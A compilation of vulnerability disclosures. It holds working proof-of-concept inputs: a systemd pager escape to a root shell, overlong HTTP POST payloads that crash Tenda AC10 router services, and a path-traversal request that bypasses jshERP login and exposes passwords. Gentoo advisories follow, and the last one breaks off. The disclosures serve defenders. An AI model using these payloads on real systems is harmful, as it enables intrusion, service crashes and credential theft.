systemd version 246 suffers from a local root privilege escalation vulnerability.

    # Exploit Title: systemd 246 - Local Privilege Escalation# Exploit Author: Iyaad Luqman K (init_6)# Application: systemd 246# Tested on: Ubuntu 22.04# CVE: CVE-2023-26604systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. This vulnerability allows a local attacker to gain root privileges.## Proof Of Concept:1. Run the systemctl command which can be run as root user.sudo /usr/bin/systemctl status any_service2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.3. Type in `!/bin/sh` in the pager to spawn a shell as root user.

systemd 246 Local Root Privilege Escalation

Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter devName at /goform/SetOnlineDevName.

\# Tenda AC10 v4 was discovered stack overflow via parameter devName at url /goform/SetOnlineDevName ###### tags: \`Tenda\` \`AC10 v4\` vendor:Tenda product:AC10 v4 version:US\_AC10V4.0si\_V16.03.10.13\_cn type:Stack Overflow author:Yifeng Li，Wolin Zhuang，Shencai Zhu; ## Vulnerability Description Tenda AC10 v4 US\_AC10V4.0si\_V16.03.10.13\_cn was discovered to contain a stack overflow via parameter devName at url /goform/SetOnlineDevName. ## Vulnerability Details In function formSetDeviceName line 9, the content obtained by parameter 'devName' is passed into v4 without check, then passed into function set\_device\_name. !\[\](https://i.imgur.com/PKg9SiC.png) In function set\_device\_name, local variable v4 is 256 bytes long.In line 45, devName's content is formatted into v4 by sprintf without checking its length, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/X2rLEwQ.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router AC10 v4 to newest version(we have a physical machine) 2. Login to 192.168.0.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/KIbBHOV.png) !\[\](https://i.imgur.com/Z4h96yE.png) \`\`\` POST /goform/SetOnlineDevName HTTP/1.1 Host: 192.168.0.1 Content-Length: 3036 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.0.1 Referer: http://192.168.0.1/parental\_control.html?random=0.3320562258410147& Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: password=f6fdffe48c908deb0f4c3bd36c032e72kjkcvb Connection: close devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=94:b8:6d:74:0f:9a \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of httpd process. !\[\](https://i.imgur.com/4qI5LlZ.png) And you can write your own exp to get the root shell.

CVE-2023-34570: Tenda AC10 v4 was discovered stack overflow via parameter devName at url /goform/SetOnlineDevName - HackMD

Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter list at /goform/SetNetControlList.

\# Tenda AC10 v4 was discovered stack overflow via parameter list at url /goform/SetNetControlList ###### tags: \`Tenda\` \`AC10 v4\` vendor:Tenda product:AC10 v4 version:US\_AC10V4.0si\_V16.03.10.13\_cn type:Stack Overflow author:Yifeng Li，Wolin Zhuang，Shencai Zhu; ## Vulnerability Description Tenda AC10 v4 US\_AC10V4.0si\_V16.03.10.13\_cn was discovered to contain a stack overflow via parameter list at url /goform/SetNetControlList. ## Vulnerability Details In function formSetQosBand line 10, v2 is a a user-controlled parameter('list') and is read in without length check, which is passed into funcition set\_qosMib\_list later. !\[\](https://hackmd.io/\_uploads/HkFmEMMB2.png) In function set\_qosMib\_list, a1's content is controlled by user, in line 41, a1's content is copied into src. !\[\](https://hackmd.io/\_uploads/Hk08EfzS3.png) Then in line 49, src's content is copied into local variable v8,which leads to a stack overflow vulnerbility. !\[\](https://hackmd.io/\_uploads/rydRVGfr2.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router AC10 v4 to newest version(we have a physical machine) 2. Login to 192.168.0.1 as admin 3. Attack with the following POC !\[\](https://hackmd.io/\_uploads/B17y8gMS2.png) !\[\](https://hackmd.io/\_uploads/r1YfrfGr3.png) \`\`\` POST /goform/SetNetControlList HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: \*/\* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 3093 list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of httpd process. !\[\](https://hackmd.io/\_uploads/ryGSUMMrn.png) And you can write your own exp to get the root shell.

CVE-2023-34569: Tenda AC10 v4 was discovered stack overflow via parameter list at url /goform/SetNetControlList - HackMD

Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter list at /goform/SetVirtualServerCfg.

\# Tenda AC10 v4 was discovered stack overflow via parameter list at url /goform/SetVirtualServerCfg ###### tags: \`Tenda\` \`AC10 v4\` vendor:Tenda product:AC10 v4 version:US\_AC10V4.0si\_V16.03.10.13\_cn type:Stack Overflow author:Yifeng Li，Wolin Zhuang，Shencai Zhu; ## Vulnerability Description Tenda AC10 v4 US\_AC10V4.0si\_V16.03.10.13\_cn was discovered to contain a stack overflow via parameter list at url /goform/SetVirtualServerCfg. ## Vulnerability Details In function formSetVirtualSer line 9, v3 is a a user-controlled parameter('list') and is read in without length check. Later in line 10, v3 is passed into function save\_virtualser\_data. !\[\](https://hackmd.io/\_uploads/BJ-1nGfBh.png) Then in function save\_virtualser\_data, line 35, the content of a2(v3) is copied to v5.Then in line 42, the content of v5 is formatted into variable v12-v15,which leads to a stack overflow vulnerbility. !\[\](https://hackmd.io/\_uploads/SyXE3zzHn.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router AC10 v4 to newest version(we have a physical machine) 2. Login to 192.168.0.1 as admin 3. Attack with the following POC !\[\](https://hackmd.io/\_uploads/B17y8gMS2.png) !\[\](https://hackmd.io/\_uploads/r1FanGzH3.png) \`\`\` POST /goform/SetVirtualServerCfg HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: \*/\* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 3093 list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of httpd process. !\[\](https://hackmd.io/\_uploads/BkP0nGzBh.png) And you can write your own exp to get the root shell.

CVE-2023-34567: Tenda AC10 v4 was discovered stack overflow via parameter list at url /goform/SetVirtualServerCfg - HackMD

Gentoo Linux Security Advisory 202311-8 - A buffer overflow vulnerability has been discovered in GNU Libmicrohttpd. Versions greater than 0.9.70 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GNU Libmicrohttpd: Buffer Overflow Vulnerability  
     Date: November 25, 2023  
     Bugs: #778296  
       ID: 202311-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A buffer overflow vulnerability has been discovered in GNU  
Libmicrohttpd.

Background  
=========  
GNU libmicrohttpd is a small C library that makes it easy to run an HTTP  
server as part of another application. GNU Libmicrohttpd is free  
software and part of the GNU project.

Affected packages  
================  
Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
net-libs/libmicrohttpd  = 0.9.70      > 0.9.70

Description  
==========  
A buffer overflow vulnerability has been discovered in GNU  
Libmicrohttpd. Please review the CVE identifier referenced below for  
details.

Impact  
=====  
A missing bounds check in the post_process_urlencoded function leads to  
a buffer overflow, allowing a remote attacker to write arbitrary data in  
an application that uses libmicrohttpd. The highest threat from this  
vulnerability is to data confidentiality and integrity as well as system  
availability.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All GNU Libmicrohttpd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">net-libs/libmicrohttpd-0.9.70"

References  
=========  
[ 1 ] CVE-2021-3466  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3466

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-08

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-08

Incorrect Access Control vulnerability in jshERP V3.3 allows attackers to obtain sensitive information via the doFilter function.

1.The affected source code file is src/main/java/com/jsh/erp/filter/LogCostFilter.java,and the affected function is doFilter.

In the filter code, use servletRequest.getRequestURI() to obtain the request path, and then determine whether the path contains /doc.html, /user/login, /user/register. If so, execute chain.doFilter(request, response) to skip this filter. Else, continue to check.

Then determine whether the path startswith allowUrls. If so, execute chain.doFilter(request, response) to skip this filter.

See the screenshot below for the value of allowUrls  
  

2.The problem lies in using servletRequest.getRequestURI() to obtain the request path. The path obtained by this function will not parse special symbols, but will be passed on directly, so you can use ../ to bypass it. Taking one of the backend interfaces /jshERP-boot/user/getAllList as an example, using /user/login/../../jshERP-boot/user/getAllList can make it satisfy requestUrl.contains("/user/login" ), and at the same time, it can request the getAllList interface to achieve login bypass.

3.The Poc is as follows:

    GET /user/login/../../jshERP-boot/user/getAllList HTTP/1.1
    Host: 192.168.124.1:9999
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    

When accessing the /jshERP-boot/user/getAllList interface directly, it will return "loginOut".  

When accessing the /user/login/../../jshERP-boot/user/getAllList interface, the user information can be obtained by bypassing the access control,whice also includes user passwords.

CVE-2023-48894: There is an Incorrect Access Control vulnerability in jshERP V3.3 that lead to the leakage of sensitive information in the backend system · Issue #98 · jishenghua/jshERP

Gentoo Linux Security Advisory 202408-13 - A vulnerability has been discovered in Nokogiri, which can lead to a denial of service. Versions greater than or equal to 1.13.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Nokogiri: Denial of Service  
     Date: August 07, 2024  
     Bugs: #884863  
       ID: 202408-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

